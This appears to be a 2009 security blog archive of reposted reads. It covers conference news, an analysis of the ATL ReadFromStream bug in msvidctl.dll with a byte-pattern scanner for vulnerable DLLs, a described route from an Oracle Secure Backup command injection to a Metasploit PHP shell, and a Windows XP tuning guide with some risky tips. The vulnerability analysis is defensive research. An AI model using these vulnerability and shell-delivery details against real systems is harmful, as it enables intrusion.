Archive for July, 2009
MAX pwned ToolsWatch :)
July 31st, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Here is a special posting … MAX on ToolsWatch
0wn3d by MAX
Las Vegas 2009
July 30th, 2009. Published under My Recent Reads. No Comments.
There are so many things going on in Vegas this year, it’s hard to keep track of them all.
1.) HD Moore and I are teaching a class on Tactical Exploitation at Blackhat July 27-28th
2.) The first day of Blackhat Briefings, July 29th we have organized an entire Metasploit Track.
Many Metasploit, Attack Research, carnal0wnage and others people will be speaking in this special track, including:
Dino Dai Zovi, Mike Kershaw, Chris Gates, Peter Silberman, Egypt, I)ruid, Valsmith, Colin Ames, and Dave Kerb.
3.) On Thursday July 30th, HD Moore, Valsmith and others will be speaking at an undisclosed location for BsidesLasVegas
4.) Friday night Attack Research has rented the top of the Riviera for a small party. Find someone from AR to get a specially minted party invite challenge coin
5.) Saturday at Defcon we have another special metasploit track that runs all day, same speakers as Blackhat but including HD Moore and others.
6.) Saturday at noon Valsmith will also be giving a skytalk
There is much, much more great stuff going on, so hope to see you there!
V.
BlackHat slides available and first blogposts
July 29th, 2009. Published under My Recent Reads. No Comments.
Blackhat was really fast to upload some of their content. You can already get it at http://www.blackhat.com/html/bh-usa-09/bh-usa-09-archives.html.
I have already glanced at lockpick forensics, sniffing keyboards with lasers and Breaking the security myths of Extended Validation SSL Certificates. Some really interesting stuff in there!!
Here are some blog posts fresh off the shelf as well:
- BlackHat 2009 Whitepaper: Attacking Interoperability
- Our Favorite XSS Filters and How to Attack Them
- Deactivate the Rootkit
- Live Blog: BlackHat 2009 Day 1
- HP researchers reveal details of browser based darknet
- SSL under attack (again) #BlackHat
Speeding up MD5 collision hashing on GPUs, breaking EV SSL, or just breaking SSL all together, I see a trend that says that public PKI is completely broken. Oh, wasn’t there a study today that said users ignore SSL warnings anyway?
Keep tuned, I’m seeing tweets that Dan Kaminsky is having a go at X.509 as well. #ssl #epicfail??
Related posts:
- How to follow Blackhat/Defcon without being there
- Preparing your laptop (or iPhone) for a security/hacker conference
(Photo under creative commons from Ben+Sam’s photostream)
Yahoo! Surrenders
July 29th, 2009. Published under My Recent Reads. No Comments.
The deal with Microsoft is a strategy of last resort for the struggling Internet giant.
The Curious Case of Asset Valuation
July 22nd, 2009. Published under My Recent Reads. No Comments.
I recently had a discussion with someone about how to do asset valuation for risk assessments. It was a good discussion that prompted me to share with you. The whole concept of asset valuation (as it exists for information security) is predicated on the assumption that acquisition cost is a good constituent factor of security risk. So, how do we evaluate the asset valuation landscape?
Let’s start with our international standard for risk assessments: ISO 27005. There is a relatively lengthy discussion of asset valuation in Appendix B.2 (read here for Alex’s 27005 review). This is encouraging, however the discussion very quickly devolves from “what does it cost to replace this” to what they term “consequences.” Consequences are what happen as a result of having the asset. What does this mean? Well, they offer a list of things that may help (they make a point to let you know this might not be a complete list):
- Interruption of service
- Inability to provide the service
- Loss of customer confidence
- Loss of credibility in the internal information system
- Damage to reputation
- Disruption of internal operation
- Disruption in the organization itself
- Additional internal cost
- Disruption of a third party’s operation
- Disruption in third parties transacting with the organization
- Inability to fulfill legal obligations
- Inability to fulfill contractual obligations
- Danger for the organization’s personnel and / or users
- Attack on users’ private life
…and this isn’t the complete list.
What strikes me as a FAIR practitioner is that this list is devoid of any taxonomy. In other words, there are no categories, just a list of specific types of incidents (that surely isn’t comprehensive). I jotted down a quick mapping to FAIR loss categories and noticed that most map to secondary loss categories, strengthening the Chicken Little security practitioner’s view of the world.
So FAIR practitioners are at an advantage when speaking about asset valuation, because we don’t get caught up in the existential discussion about an asset’s “consequences,” and likewise we don’t narrow our focus to just replacement cost. We have our capacious list of loss categories, and we rely on the scenario to help guide our Probable Loss Magnitude discussions. Because asset valuation (per my strict vantage point of replacement only) is myopic, the bigger, more important discussion is what the losses look like. Certainly, these are consequences, but the perspective is different. Instead of listing every possible loss for a given asset, we only estimate the losses for an asset in a given scenario. There may be many scenarios, but funneling our thoughts to the specific saves us from wondering what effect nuclear fallout will have on our database servers.
The six loss categories are great fodder for really interesting discussions that bring the security and risk practitioner closer to the business, and this is key: you can get asset valuation from the balance sheet; true business risk often sits in the heads of technical, managerial, and executive people in the business. What this means is that risk (and infosec really) needs to be the (or at least a) bridge between IT and the business.
Eclipse of the Century Live Online Tonight
July 21st, 2009. Published under My Recent Reads. No Comments.
Watch tonight’s eclipse online, unless you’re in Asia. There won’t be an eclipse this long again until 2132.
Poking around MSVIDCTL.DLL
July 21st, 2009. Published under My Recent Reads. No Comments.
Hey all,
I have to admit that I did not follow the msvidctl.dll situation all that closely, except for my short tweet that this bug was apparently reported more than a year ago. Yesterday, my old friend Dennis Elser piqued my interest: He had isolated the bug down to a function called ATL::CComVariant::ReadFromStream. He had determined that the function in question made a rather strange mistake: Instead of passing a pointer to a data buffer to IStream::Read, it took the address of a (small) local variable, and passed this address as output buffer to IStream::Read, along with a length read from the stream previously.
Somebody clearly got confused.
So Dennis and I sat down tonight and did a bit of digging around and tried to clarify what was going on. We dug in a bit deeper, and ended up with the following understanding of the situation:
- If the stuff that is supposed to be deserialized does not contain the proper value in the first 2 bytes, 8 more bytes are read, and SafeArrayCreate is used to create a new array with a 4-byte size obtained from these bytes.
- A pointer to the allocated memory is obtained by way of calling SafeArrayAccessData. This function places a pointer to the memory in question into a memory cell pointed to by its second argument.
- Instead of passing the CONTENTS of the memory cell pointed to by the second argument to IStream::Read, the code in question passes the address of this variable in. This happens to be the re-used memory for the first argument of ReadFromStream, hence it is on the stack. Memory corruption hilarity ensues.
This is a cute little bug. First of all, it is a beautiful example of a single excess "&" in the source code. But what is most amusing about this bug is the centrality of it — it is, after all, in a method of a class from the ATL.
Everybody loves bugs in libraries. Few things fill my heart with quite as much amusement as bugs in heavily-used, statically-linked libraries. OpenSSL (and libeay) was good for many laughs in the past, zlib was a favourite for a long time, too.
So what we have here is a bug in a component that is used fairly widely, and that has the property of being statically linked (yay templates !).
Now, a quick search of my harddisk turned up that a lot of third-party components (flash) contain the same function — but in old and non-vulnerable versions (for an extra dash of irony, the function used to be safe before all this SafeArray-stuff was added). Only a small fraction of the files that use the ATL and contain this function appear to contain it in a vulnerable version.
We ended up building a really naive / stupid / false-negative-and-false-positive-prone regexp to scan for the vulnerable basic block. This is of course going to fail if anyone has tweaked their optimization settings etc., but it would still be interesting to find out how many files contain this “trivial” byte string.
So I searched my windows directory for the following regexp pattern:
import re
# the two \x2E bytes are "." so with re.DOTALL they match any displacement byte
pattern = b"\x8B\x07\x6A\x00\xFF\x75\x2E\x8D\x4D\x2E\x51\x57\xFF\x50\x0C\x53"
r = re.compile(pattern, re.DOTALL)
There were a few files in which this pattern was found (XP):
Found pattern in file c:\Windows\system32\ieframe.dll
Found pattern in file c:\Windows\system32\mstscax.dll
Found pattern in file c:\Windows\system32\msvidctl.dll
Found pattern in file c:\Windows\system32\wmp.dll
Found pattern in file c:\Windows\system32\wmpdxm.dll
Dennis searched for the same pattern on his disk (Vista) and found:
c:\windows\system32\cic.dll
c:\windows\system32\comsnap.dll
c:\windows\system32\comsvcs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\mmcndmgr.dll
c:\windows\system32\mstscax.dll
c:\windows\system32\MSVidCtl.dll
c:\windows\system32\puiobj.dll
c:\windows\system32\rdpencom.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\wiaaut.dll
c:\windows\system32\wmp.dll
c:\windows\system32\wmpdxm.dll
Why the difference? Well, amusingly, shdocvw.dll on my XP machine doesn’t have this SafeArray-stuff in it yet — it is probably compiled using an older, not vulnerable variant of the ATL — whereas Dennis’s variant of the same DLL is much newer, compiled with the ‘broken’ variant of the ATL.
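The complete form of the scan the post sketches, as an added example that is not the authors’ code: it walks a directory tree for the same byte pattern and reports the offsets of each hit. The instruction annotations, the file-suffix filter and the two constructed sample blobs are my additions; the post only gives the pattern and the two compile lines.

```python
import os
import re
import tempfile

# Byte pattern for the vulnerable ReadFromStream basic block, copied from the
# post. In the post the two "\x2E" bytes are regex dots; with re.DOTALL they
# match any single byte, so the two ebp displacements are left open. Written
# here with explicit dots. The instruction annotations are my reading of the
# opcode bytes, not from the post.
VULN_BLOCK = re.compile(
    rb"\x8B\x07"      # mov eax, [edi]      ; load the IStream vtable pointer
    rb"\x6A\x00"      # push 0              ; pcbRead = NULL
    rb"\xFF\x75."     # push dword [ebp+X]  ; cb = length read from the stream
    rb"\x8D\x4D."     # lea ecx, [ebp+Y]    ; address of the stack variable ...
    rb"\x51"          # push ecx            ; ... passed as the output buffer
    rb"\x57"          # push edi            ; this
    rb"\xFF\x50\x0C"  # call [eax+0Ch]      ; IStream::Read, 4th vtable slot
    rb"\x53",         # push ebx
    re.DOTALL,
)

# Constructed samples (not real binaries). The "vulnerable" one carries the
# block with arbitrary displacements 0x10 and 0xF8 after 16 bytes of NOP
# padding; the "safe" one pushes the stack variable's contents
# (push dword [ebp-8]) instead of its address, so the block does not match.
VULNERABLE_SAMPLE = (
    b"\x90" * 16
    + b"\x8B\x07\x6A\x00\xFF\x75\x10\x8D\x4D\xF8\x51\x57\xFF\x50\x0C\x53"
    + b"\xC3"
)
SAFE_SAMPLE = (
    b"\x90" * 16
    + b"\x8B\x07\x6A\x00\xFF\x75\x10\xFF\x75\xF8\x57\xFF\x50\x0C\x53"
    + b"\xC3"
)


def scan_bytes(data, pattern=VULN_BLOCK):
    """Return the offsets of every occurrence of `pattern` in `data`."""
    return [m.start() for m in pattern.finditer(data)]


def scan_file(path, pattern=VULN_BLOCK):
    """Read one file and return the offsets at which the block occurs."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read(), pattern)


def scan_tree(root, suffixes=(".dll", ".ocx", ".exe"), pattern=VULN_BLOCK):
    """Walk `root` and return {path: [offsets]} for files containing the block.

    Only files with a PE-style suffix are opened (my filter, not the post's);
    files that cannot be read are skipped instead of aborting the scan.
    """
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(suffixes):
                continue
            full = os.path.join(dirpath, name)
            try:
                offsets = scan_file(full, pattern)
            except OSError:
                continue
            if offsets:
                hits[full] = offsets
    return hits


def demo_scan():
    """Write the constructed samples into a temp tree, scan it, and return
    {basename: offsets} so the result does not depend on the temp path."""
    with tempfile.TemporaryDirectory() as root:
        sub = os.path.join(root, "system32")
        os.makedirs(sub)
        with open(os.path.join(sub, "vuln_sample.dll"), "wb") as fh:
            fh.write(VULNERABLE_SAMPLE)
        with open(os.path.join(sub, "safe_sample.dll"), "wb") as fh:
            fh.write(SAFE_SAMPLE)
        with open(os.path.join(root, "notes.txt"), "wb") as fh:
            fh.write(VULNERABLE_SAMPLE)  # wrong suffix: must be skipped
        hits = scan_tree(root)
    return {os.path.basename(p): offs for p, offs in hits.items()}


if __name__ == "__main__":
    import sys

    # With a directory argument, scan it (e.g. a copy of %SystemRoot%);
    # otherwise run the self-contained demo on the constructed samples.
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo_scan()
    for path, offsets in sorted(results.items()):
        print("Found pattern in file %s at %s"
              % (path, ", ".join(hex(o) for o in offsets)))
```

As the post says, a byte-pattern match is only a hint: a different optimizer setting changes the encoding, so a hit or a miss still has to be confirmed in a disassembler.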
So, where does this leave us?
- The bug is actually much “deeper” than most people realize.
- The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.
- The bug might have weaseled its way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.
- If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.
- Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.
- There might be a lot of recompiling next week.
- IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.
It just seems that spending time to improve BinDiff’s ability to find statically linked libraries might have been worth it.
Anyhow, I really need to get to sleep — I have a train to catch in a bit more than 4 hours.
A lot of credit for this post has to go to Dennis Elser — he did most of the hard work before we sat down.
‘Sexy View/Sexy Space’ Symbian Worm Spreading
July 17th, 2009. Published under My Recent Reads. No Comments.
Worm’s application payload comes Symbian-signed, researchers disagree over whether or not it’s building a full-blown mobile phone botnet
Oracle Secure Backup Command Injection to Metasploit PHP Shell
July 16th, 2009. Published under My Recent Reads. No Comments.
Background and motivation here:
http://joxeankoret.com/blog/?p=39
Before I forget thanks to egypt, pragmatk, and of course MC…
MSF trunk has had an exploit for a while that exploits the above:
http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/ad…
Given the example in Joxean’s advisory with the PHP shell, I hit up the Metasploit PHP ninja (egypt) on how to leverage it.
Metasploit has a PHP reverse and bind shell; you can use the multihandler to catch callbacks or connect to the bind shell. To get the shell on the box we can output the payload as raw or base64.
SpyDLLRemover v2.5 Unleashed!
July 16th, 2009. Published under My Recent Reads. No Comments.
Hey guys,
We have released the next version of SpyDLLRemover [v2.5], which includes major updates and minor bug fixes. We have added a DLL Tracer tab, which lets you [the user] search for processes running a specific DLL on your system. That way, if you know the name of your injected DLL, it will list all the process names that run this DLL.
Check it out @: http://www.rootkitanalytics.com/tools/spy-dll-remover.php
From here on, we are shifting from a 3-number versioning system to a 2-number system and we are reserving the 3rd number for internal use [to track minor updates].
If you have any questions or comments, do not hesitate to contact us [at contact.fingers @ gmail.com] either way.
EF
Make Windows XP Blazingly Fast
July 16th, 2009. Published under My Recent Reads. No Comments.
I’ve been using Windows since before “Windows for Workgroups 3.x” and have used most of the Windows releases since, on a wide variety of cheaper-than-cheap computers and platforms that are slower than slow. I’m always interested in new ways to maximize speed, and over the years I’ve picked up quite a few little tips on how to max out your Windows PC. I am not fond of being forced to use MS, and am not an MS expert, so I hope all you Windows peeps will share your tips with us. And some of these tips can crash your machine if you don’t know what you are doing.
Overview and General Ideas
Basic Definitions
- CPU – Central Processing Unit
- This is what Intel and AMD commercials are about, this chip functions like a calculator, computing all the data.
- Hard Drive
- This is a glorified CD-ROM disc that is much faster and has a higher capacity than a CD-ROM. This is where all your files and your operating system are stored.
- RAM – Random Access Memory
- Data that is frequently accessed is stored in RAM instead of the Hard Drive because RAM is much much faster.
- Page File / Virtual Memory
- This is literally a file that is stored on your hard drive and is used as a form of RAM when you run out of real RAM. Much slower than RAM (because it is located on the hard drive), it is used to store bits of data used by programs.
Three-pronged attack against the sluggish druggish
- Increase RAM/Memory: Reducing the amount of RAM that is wasted by unneeded programs, unused device drivers and devices, background services, visual effects, and various other stuff frees up RAM for your needed programs and processes. The final step of this article details the Cacheman software that automatically takes care of everything this article doesn’t go into (like registry modifications and hidden tweaks).
- Optimize Hard Drive Data. The attack, in order:
  - Reduce the amount of data on the drive by removing unneeded data and configuring optimum settings to prevent buildup in the future.
  - Configure settings which minimize the amount of disk activity, e.g., reading and writing to disk.
  - Defragment the data that is left, and set up an automated system to prevent fragmentation in the future.
- Free Up CPU Time: Almost all of the following tips will help to decrease the amount of CPU processing time that is wasted on unneeded processes.
Part 1: Increase and Free Memory/RAM
Configure Performance Options
Control Panel -> System -> Advanced -> Performance -> Settings
If you have massive RAM like I do, best appearance is nice. To max your speed change to “Adjust for best performance”.
Change Theme to Classic
The Classic Theme uses less RAM and CPU than the newer XP themes.
Fine-Tune Effects
Disable all for maximum speed. I like to only leave ClearType enabled.
Color quality and Resolution
To sacrifice quality for speed, change the Color quality to a lower setting, and lower the resolution if you want.
Clean up that Desktop!
Your desktop is always loaded in RAM, as it is always available to view. So everything that is ON your desktop is likewise stored in RAM. This means that every icon located on your desktop, which is actually an icon file, is loaded in RAM. What I do is instead of a cluttered Desktop always loaded in RAM, I simply create 1 folder called Desktop on my Desktop, and move everything from my desktop to that folder. That way instead of all those icons taking up memory, now only the single folder icon is taking up RAM. Not a HUGE impact, but it illustrates what RAM is and how you can stop wasting it.
Make Background Solid Color
By setting the background image of your desktop (and folders if you are using custom folder backgrounds) to none, and instead just using a solid color (like blue) you free up RAM. If your desktop uses a high-quality background image (like mine) that is a 5MB jpeg image, that effectively wastes 5MB of your RAM. A solid color background uses none.
Optimize Folder Options
Open up Explorer/My Computer -> Tools -> Folder Options
First change the option to “Use Windows classic folders”. Now go to the View tab and hit the button “Reset all Folders”, which will clear your individual folder viewing settings. Then change the options to the ones I have selected in the image for optimum speed; it’s up to you which options you don’t want to change. The searching for network folders is a very real cause of slowness.
Page File / Virtual Memory
The optimal way to use a page file is to not use a pagefile and max out your physical RAM. Next to doing that (which Windows won’t let you do anyway, they love pagefiling), the optimal setup is to have the pagefile on a 2nd hard-drive disk. The computer can only read/write data to/from the hard drive at a certain speed, and only a certain amount of reads/writes can be going on at one time. Think of it like a pipe. Having the pagefile.sys on the same disk that Windows and all the programs are loaded on clogs the pipe and limits flow of data in both directions.
Note that moving the page file to a separate partition on the same hard drive would NOT fix this problem or alleviate the bottleneck in any way, so the solution is to get a 2nd hard drive, I personally recommend these 2 $49.99 – 320GB x 7500RPM hard-drives that are very reliable.
Page File Size
The size of your pagefile is up for debate, no clear answer, but I’ve tried a lot of different configurations over the years and here is what I recommend. If you have little RAM (less than 1GB), then you should just let Windows control it. Otherwise use the custom option to set it at a low initial size of 400MB to grow up to 3096MB. I have 4GB of RAM, so I set it to start at 100MB and grow to 5000MB. The general rule is to set it to be 1.5x the amount of RAM you have.
Disable Devices
Disable any devices you never use, like internal modems, firewire ports, floppy drives, etc. Also disable them in your system’s BIOS if you can.
Uninstalling Devices
If you have devices that you used on your computer in the past but don’t anymore, they are still being loaded up by Windows and at the very least hogging some resources. So go through and uninstall them (you have to select View -> Show hidden devices). If you plug them back in they will be re-installed with the “Found new hardware” wizard.
Disable Fast User Switching
Control Panel -> Users -> Change the way users log on
Make sure you disable fast-user-switching unless you absolutely must have it. I’ve found it to be a cool feature if you are a basic computer user not installing programs or tweaking settings. But it can create big problems if you use your computer for all sorts of *advanced* stuff (advanced for Windows)… Plus disabling it will have some speed improvements.
Optimizing Services
First make sure you export your current services to a backup file before you begin. There are a number of informative articles about this topic on the web.
Removing Unneeded Network Protocols
This actually helps a lot and can have a significant impact on your computer speed, much more so than any impact on network speed improvements. These protocols require all sorts of RAM and are kept loaded. They also represent a security risk as it provides another process to be attacked.
Part 2: Optimize Hard Drive and Data
Recommended Hard Drives
These are the cheapest prices for these tried and true hard-drives. I love TigerDirect and recommend you check them out.
- $49.99 Seagate Barracuda 320GB – 7200RPM
- $49.99 WD3200 Caviar Blue 320GB – 7200RPM
- $59.99 WD5000 Caviar Blue 500GB – 7200RPM
- $229.99 WD VelociRaptor 320GB – 10,000RPM, FAST!
File System Tweaks
Start -> Run -> compmgmt.msc
Check the structure and properties of your disks and partitions to see if anything is out of place. Make sure file systems are using NTFS. But some partitions, like the Dell utility partition or a partition shared by Linux/Mac/Windows on dual-boot systems, may be FAT or FAT32. To convert FAT-based to NTFS, defragment the MFT, resize NTFS clusters, etc., you have to use a third-party product. I personally use Norton Partition Magic, Paragon Partition Manager, and Acronis Disk Director Suite (plus 20 other various tools).
2nd Hard Drive
*Advanced*
If you’re lucky or smart enough to have more than one hard drive disk installed, in addition to moving your pagefile to that 2nd hard-drive you should set up the hard drive with at least 2 partitions first. Say you install one of those 320GB hard drives I recommend… Here’s how I set the partitions on the 2nd hard-drive.
- 6.5GB – S: [SWAP] – First partition is fastest area on drive, this partition is ONLY for the pagefile. Size is 1.5x the max size of your pagefile setting, or 1.5x the amount of RAM.
- 13.5GB – 2nd partition is not given a drive letter; instead it is mounted as both the C:\TMP and C:\TEMP folders. Similarly to optimizing the pagefile, Windows and programs use the TMP and TEMP folders A LOT, so this will really speed up any installations and a lot of Windows itself. *very tricky*
- 300GB – This is also mounted instead of given a drive letter, mounted as “C:\Documents and Settings” which is where all your settings and user files (Desktop, My Documents) are stored. *very tricky*
Setting up the TMP and “Documents and Settings” folders that way is NOT for beginners; it’s advanced and dangerous if you do it wrong. But it definitely has one of the biggest noticeable speed benefits.
Remove Unnecessary Programs
Control Panel -> Add or Remove Programs
Remove all programs that you are positive you don’t need anymore; the more you remove, the better. Microsoft provides a free tool that is simple and helpful when removing programs. Download it at: Windows Installer CleanUp Utility
Remove Windows Components
The only main categories I need are Internet Explorer, Windows Media Player, Update Root Certificates, and Accessories and Utilities
I also remove the Games category which is a subcategory of Accessories and Utilities.
System Restore Optimization
Turn off system restore on any drives that are not crucial… So if you have a 2nd hard-drive that is used for pagefile and temp file storage, turn it off. And you should make sure the settings aren’t too generous, I usually never go higher than 10GB.
Recycle Bin Settings
Keep this setting to a low value, and try not to delete stuff you will need later. I personally disable the Recycle Bin completely, but I come from a Unix background so I have no issues with misplacing files.
Remove Unnecessary Fonts
Fonts are loaded up by default by Windows and every time you load a program like Photoshop, Microsoft Word, Outlook, etc., so moving any you never use out of the C:\Windows\Fonts folder saves RAM, CPU and HD space. This is a bit hairy, but I sort by size and then check out how long it’s been since the font has been accessed by looking at the file attributes. The fewer fonts you have, the faster your computer, but there is obviously a trade-off. You can move all fonts except for a few basic ones included with Windows to a backup folder instead of deleting them, then reboot, and if your fonts are messed up then move some of the fonts from the backup folder back and try again.
Prefetch Cleaning
Delete the contents of the C:\WINDOWS\Prefetch folder and restart the computer. It’s good to empty this folder and reboot after major upgrades or about once a month.
Part 3: Finishing the Optimization Process
These 3 tips will have the biggest speed impact for 99% of you, this is some really good stuff.
Disk Cleanup
Start -> Run -> %SystemRoot%\system32\cleanmgr.exe
This wizard is a very useful tool that combines several cleanup tools in one location. It also provides a way to clean up all past restore points saved on your disk except the most recent one.
Defragmenting with SmartDefrag
The World’s Most Efficient Defragmenter
What’s the primary cause of slow/unstable PC performance? It’s disk fragmentation. Smart Defrag helps defragment your hard drives more efficiently than any other product on the market, free or not.
This powerful, award-winning free defragmenter is 100% safe and clean with no adware, spyware, or viruses.
Cacheman XP Optimization
Cacheman is a Windows software designed to speed up your computer by optimizing several caches, managing RAM and fine tuning a number of system settings. Auto-Optimization makes it suitable for novice and intermediate users yet it is also powerful and versatile enough for computer experts. Backups of settings ensure that all user modifications can be reversed with a single click.
Software Recommendations
From the Sysinternals Suite
Autoruns
See what programs are configured to startup automatically when your system boots and you login. Autoruns also shows you the full list of Registry and file locations where applications can configure auto-start settings.
Process Explorer
Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.
Process Monitor
Monitor file system, Registry, process, thread and DLL activity in real-time.
VMMap
See a breakdown of a process’s committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Identify the sources of process memory usage and the memory cost of application features.
Tweak UI Powertoy
This PowerToy gives you access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more.
Social Engineering Contest – Defcon 2009
July 16th, 2009. Published under My Recent Reads. No Comments.
Social Engineer your way to a free course!
DC718 and Telephreak are bringing Social Engineering back to Defcon.
Offensive Security has linked together with DC718, Telephreak, the contest/event Goons Pyr0 and Russr and www.social-engineer.org to have the best of the best to judge and help mold this contest into the display of the serious threat that still [...]
In Case You Missed It: Reflecting on the CRTC’s Net Neutrality Hearing
July 16th, 2009. Published under My Recent Reads. No Comments.
In case you missed or avoided the CRTC net neutrality hearing, I thought I would post a few reflections (my summaries of the events are available at Day 1, 2, 3, 4, 5, 6, and 7; additional coverage at NetNeutrality.ca). While there were some notable anecdotes and quotes (Rogers’ comment about traffic managing a cure for cancer comes to mind), I would point to six key revelations that evolved over the course of the week and a half.
1. The rate of network traffic growth is slowing. This was raised midway through the first week by Professor Odlyzko and was subsequently confirmed by several ISPs. The revelations ran counter to the general sense before the hearings that ISPs cannot keep pace with the rate of growth. In fact, it turns out the opposite is true – reasonable new investment in the networks can address current growth rates.
2. There is a wide variation in the use of traffic management tools with a different approach for pretty much every major ISP. There are those that throttle all the time (Cogeco), during large chunks of the day (Bell), only during congested periods (Shaw), or not at all (Telus, Videotron). There are those that throttle upload only (Rogers) or upload and download (Bell). There are those that use "economic measures" such as bit caps effectively (Videotron) and others that doubt it can be an effective approach on its own (Bell). This points to the fact that granular rules will be difficult, but broader principled tests are essential.
3. The rules for retail and wholesale will be different. The hearing surprisingly included a near-rehearing of the Bell v. CAIP case. Wholesale services were much discussed as the CRTC recognized the potential of independent ISPs to inject additional competition into the marketplace. Based on the evidence, it would appear that the problems with wholesale are largely a Bell problem. Many other ISPs that offer wholesale services do not traffic manage or have such small wholesale businesses that the impact is fairly small. Bell is a big player in the wholesale side and they have designed their network in a manner that makes it difficult to fully exploit the competitive potential of smaller entrants. While CAIP argued for rules against wholesale throttling but against retail restrictions (thereby abandoning consumer interests), the opposite seems more likely to occur.
4. Disclosures are woefully inadequate in Canada. Each day brought new and surprising revelations about how little ISPs tell their customers about their traffic management practices. By far the most egregious was Rogers, which admitted that it charges tiered pricing for faster upload speeds but that all tiers were throttled to the same speed when using P2P. In other words, the Extreme subscriber who pays $59.99 per month and is promised fast upload speeds (1 Mbps) actually gets the same upload speed as the Express subscriber who pays $46.99 per month and is promised upload speeds of 512 kbps. There were similar stories from many other ISPs, who disclosed actual speeds that bring P2P down to a virtual crawl. Disclosure has improved over the past year as the issue has gained prominence, but there clearly is a long way to go.
5. Managed networks vs. public Internet. ISPs do not focus on the fact that many run managed IP networks offering telephony and IPTV on the same pipe as the public Internet services. When asked whether the two impact each other, the answer came back that it could. In fact, ISPs were at pains to say that while it could happen, it would not happen since they ensure that they provision enough bandwidth for their managed services. Yet in examples such as Bell's three users promised 5 megs but with only 10 megs to share, it was apparent that the same cannot be said for oversold public Internet services.
6. The Commission takes privacy seriously. The ISPs seemed surprised that the Commission regularly asked about the privacy impact of throttling and deep-packet inspection. The Commission was similarly surprised when Bell admitted that Canadian privacy law would permit the use of DPI data for marketing purposes with the customer's consent.
Where to from here?
The parties will have a couple of weeks to file final submissions and a decision will likely take several months. My best guess is that the Commission will likely leave the wholesale side alone, though a best case might be to place restrictions on traffic management where the provider has the capability of differentiating between wholesale customers. Bell says that they cannot do so today, but the introduction of usage based billing might change that equation.
On the retail side, I think a four-pronged approach is possible. First, the Commission could adopt the Open Internet Coalition/CIPPIC style test based on Oakes that permits traffic management practices so long as they further a pressing and substantial objective, are narrowly tailored to the objective, and are the least restrictive means of achieving the objective. This test would give useful guidance to ISPs and ensure that there are appropriate limits on traffic management practices that have no clear correlation with network congestion. Second, the Commission can affirm the role of current law against undue preferences and work to stop any attempt to leverage network management for unfair advantage. Third, it can establish minimum disclosure requirements including information on traffic management practices such as time, targets, and speeds when shaping. Fourth, the Commission can establish a prohibition against the use of DPI data for any purpose other than network management.
Of course, the Commission could decide to do nothing and simply retain the power to address complaints as they arise. If that approach is adopted, I think there would be significant political pushback, with political parties seeking net neutrality legislative reform.
Cloud Security: Waiting For Godot & His Silver Bullet
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
It’s that time again. I am compelled after witnessing certain behaviors to play anthropologist and softly whisper my observations in your ear.
You may be familiar with Beckett’s “Waiting For Godot”*:
Waiting for Godot follows two days in the lives of a pair of men who divert themselves while they wait expectantly and unsuccessfully for someone named Godot to arrive. They claim him as an acquaintance but in fact hardly know him, admitting that they would not recognise him were they to see him. To occupy themselves, they eat, sleep, converse, argue, sing, play games, exercise, swap hats, and contemplate suicide — anything “to hold the terrible silence at bay”
Referencing my prior post about the state of Cloud security, I’m reminded of the fact that as a community of providers and consumers, we continue to wait for the security equivalent of Godot to arrive and solve all of our attendant Cloud security challenges with the offer of some mythical silver bullet. We wait and wait for our security Godot as I mix metaphors and butcher Beckett’s opus to pass the time.
Here’s a classic illustration of hoping our way to Cloud security from a ComputerWeekly post titled “Cryptography breakthrough paves way to secure cloud services:”
A research student who had a summer job at IBM, has cracked a cryptography problem that has baffled experts for over 30 years. The breakthrough may pave the way to secure cloud computing services.
This sounds fantastic and much has been written about this “homomorphic encryption,” with many people espousing how encryption will “solve our Cloud security problems.”
It’s a very interesting concept, but as to paving the “…path to secure cloud computing,” the reality is that it won’t. At least not in isolation and not without some serious scale in ancillary support mechanisms including non-trivial issues like federated identity.
Bruce Schneier wades in with his assessment:
Unfortunately — you knew that was coming, right? — Gentry’s scheme is completely impractical…Despite this, IBM’s PR machine has been in overdrive about the discovery. Its press release makes it sound like this new homomorphic scheme is going to rewrite the business of computing: not just cloud computing, but “enabling filters to identify spam, even in encrypted email, or protection information contained in electronic medical records.” Maybe someday, but not in my lifetime.
The reality is that in addition to utilizing encryption — both existing and new approaches — we still continue to need all the usual suspects as they deal with the fact that fundamentally we’re still in a cycle of constructing insecure code in infostructure sitting atop infrastructure and metastructure that has its own fair share of growing up to do.
As a security architect, engineer, or manager, you need to continue to invest in understanding how what you have does or does not work within the context of Cloud.
You will likely find that you will need to continue to invest in threat and trust model analysis, risk management, vulnerability assessment, (id)entity management, compensating controls implemented as hardware and software technology solutions such as firewalls, IDP, DLP, and policy instantiation, etc., as well as a host of modified and new approaches to dealing with Cloud-specific implementation challenges, especially those based on virtualization and massive scale with multitenancy.
These problems don’t solve themselves and we are simply not changing our behavior. We wait and wait for our Godot.
So here’s the obligatory grumpy statement of the obvious as providers of solutions and services churn to deliver more capable solutions to put in your hands:
There is no silver bullet, just a lot of silver buckshot. Use it all. You’re going to have to deal with the cards we are dealt for the foreseeable future whilst we retool our approach in the longer term and technology equalizes some of our shortfalls.
Godot is not coming and you likely wouldn’t recognize him if he showed up anyway because he’d be dressed in homomorphic invisible hotpants…
Get on with it. Treat security as the enterprise architecture element it is and use Cloud as the excuse to make things better by working on the things that matter.
If Godot does happen to show up, tell him I want my weed whacker back that he borrowed last summer.
/Hoff
* Wikipedia
Firefox 3.5 escape() Return Value Memory Corruption Metasploit Exploit
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
